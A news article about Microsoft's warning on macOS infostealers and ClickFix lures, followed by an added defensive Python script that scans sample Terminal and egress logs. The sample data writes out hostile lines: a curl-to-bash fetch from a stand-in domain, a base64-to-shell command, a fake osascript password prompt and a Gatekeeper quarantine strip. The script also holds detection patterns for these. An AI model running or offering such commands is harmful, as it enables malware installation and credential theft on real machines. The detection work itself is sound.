Microsoft warns infostealer malware is 'rapidly expanding beyond traditional Windows-focused campaigns' and targeting Mac devices

An image of macOS’s app switcher.
(Image credit: MacFormat)

  • Microsoft warns macOS now faces a rapidly expanding malware and infostealer ecosystem
  • Threat actors use social engineering and malicious ads to deliver DMG installers with variants like DigitStealer, MacSync, and AMOS
  • Attackers target browser sessions, cloud tokens, and developer credentials, while abusing legitimate tools like WhatsApp and Google Ads for propagation

Windows is no longer the only major target for cybercriminals - new research from Microsoft finds macOS is now a significant target in its own right, with users facing a “rapidly expanding” ecosystem of malware, social engineering tactics, and legitimate but weaponized tools.

A Microsoft report found hackers are using social engineering techniques such as ClickFix (a fake error or verification prompt that instructs the victim to paste a “fix” command into Terminal, which in turn fetches and runs the malware), as well as malicious advertising campaigns, to deliver disk image (DMG) installers.

These installers then drop all sorts of nasties, but a few malware variants stand out - DigitStealer, MacSync, and Atomic macOS Stealer (AMOS). Microsoft also said that cross-platform malware, like those written in Python, is accelerating infostealer activity because it lets threat actors reuse the same tooling across mixed Windows and macOS environments.

Long-running aggregation effort

Most of the time, the crooks are interested in stealing sensitive data. However, that no longer means just passwords - it also includes browser sessions, keychains, cloud tokens, and developer credentials, since these secrets enable account takeovers, supply chain compromise, business email compromise (BEC) and ransomware attacks and, in some cases, direct cryptocurrency theft.

Microsoft also observed the abuse of legitimate tools and services. For example, it has seen hackers compromising people’s WhatsApp accounts and then using them to propagate infostealers and other malware.

In other cases, they’ve seen malicious ad campaigns running on the Google Ads network, promoting a fake PDF editor that not only deploys an infostealer but also establishes persistence on the machine.

The company has also shared a long list of recommendations and mitigations that businesses should follow, including educating employees about phishing, monitoring for suspicious Terminal activity, and inspecting network egress for POST requests to newly registered or suspicious domains.

Also, businesses should turn on cloud-delivered protection in Defender, deploy cloud-based machine learning protections, run EDR in block mode, and more.
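Two of the recommendations above, watching for suspicious Terminal activity (the ClickFix paste-a-command lure) and inspecting egress for POST requests to newly registered or unknown domains, are easy to prototype. The script below is an added example written for this page, not code from Microsoft's report or from TechRadar. It runs over constructed sample telemetry: the process-event and egress log formats, the regex heuristics, the domain names and the registration dates are all assumptions made for illustration; in practice the registration data would come from a WHOIS/RDAP lookup or a newly-registered-domain feed, and the event lines from your EDR or proxy.

```python
import re
from datetime import date

# Constructed sample telemetry (not real data): one process-start event per line,
# "timestamp user parent_process command_line", as a hypothetical EDR export might look.
PROCESS_EVENTS = """\
2025-01-10T09:12:01Z alice Terminal /bin/bash -c "curl -fsSL https://verify-captcha.example/check.sh | bash"
2025-01-10T09:13:07Z alice Terminal echo aGVsbG8= | base64 -d | sh
2025-01-10T09:15:00Z alice Terminal ls -la /Users/alice/Projects
2025-01-10T09:16:44Z bob Finder osascript -e 'display dialog "macOS needs your password" default answer "" with hidden answer'
2025-01-10T09:18:02Z bob Terminal xattr -c /Users/bob/Downloads/PDFEditor.app
2025-01-10T09:20:10Z bob Terminal git pull origin main
""".splitlines()

# Constructed egress log (not real data): "timestamp src_ip method host path bytes_out".
EGRESS_LOG = """\
2025-01-10T09:12:30Z 10.0.0.5 GET verify-captcha.example /check.sh 0
2025-01-10T09:13:40Z 10.0.0.5 POST verify-captcha.example /gate 483210
2025-01-10T09:21:00Z 10.0.0.7 POST github.com /api/graphql 1204
2025-01-10T09:22:15Z 10.0.0.7 POST upd-7f3a.example /p 91233
""".splitlines()

# Assumed registration dates standing in for a WHOIS/RDAP lookup or an NRD feed.
REGISTERED_ON = {
    "verify-captcha.example": date(2025, 1, 3),
    "github.com": date(2007, 10, 9),
}

# Heuristics for the Terminal tradecraft ClickFix-style lures rely on. These are the
# example author's assumptions, not rules from the report; tune them to your fleet.
TERMINAL_RULES = {
    # fetch a remote script and pipe it straight into a shell
    "download-and-execute": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
    # decode an inline base64 blob and pipe it into a shell
    "decode-and-execute": re.compile(r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*(ba|z)?sh\b"),
    # AppleScript password prompt with a hidden answer field (credential phishing)
    "fake-password-dialog": re.compile(r"osascript.*display dialog.*hidden answer"),
    # stripping extended attributes, which removes the Gatekeeper quarantine flag
    "quarantine-strip": re.compile(r"\bxattr\b.*(-c\b|com\.apple\.quarantine)"),
}


def scan_process_events(lines, rules=TERMINAL_RULES):
    """Return (user, rule_name, command_line) for every event that matches a rule."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue  # malformed line, skip rather than crash the sweep
        _ts, user, _parent, cmd = parts
        for name, rx in rules.items():
            if rx.search(cmd):
                hits.append((user, name, cmd))
    return hits


def scan_egress(lines, registered_on=REGISTERED_ON, today=date(2025, 1, 10), max_age_days=30):
    """Flag POSTs to domains registered within max_age_days, or with no registration record."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) != 6:
            continue
        _ts, src, method, host, _path, size = parts
        if method != "POST":
            continue  # the recommendation is specifically about POST (upload) traffic
        reg = registered_on.get(host)
        if reg is None:
            reason = "no registration record"
        elif (today - reg).days <= max_age_days:
            reason = f"domain registered {(today - reg).days} days ago"
        else:
            continue
        findings.append({"src": src, "host": host, "bytes_out": int(size), "reason": reason})
    return findings


if __name__ == "__main__":
    for user, rule, cmd in scan_process_events(PROCESS_EVENTS):
        print(f"[terminal] {user}: {rule}: {cmd}")
    for f in scan_egress(EGRESS_LOG):
        print(f"[egress] {f['src']} -> {f['host']} ({f['bytes_out']} bytes): {f['reason']}")
```

The two scanners are deliberately independent: a `download-and-execute` hit from Terminal followed minutes later by a large POST from the same host to a days-old domain is the sequence the report describes, so correlating on user or source IP across both result sets is the obvious next step. The `bytes_out` field is kept in the findings for that reason: a multi-hundred-kilobyte upload to a fresh domain is what keychain and browser-session theft looks like on the wire.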



Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
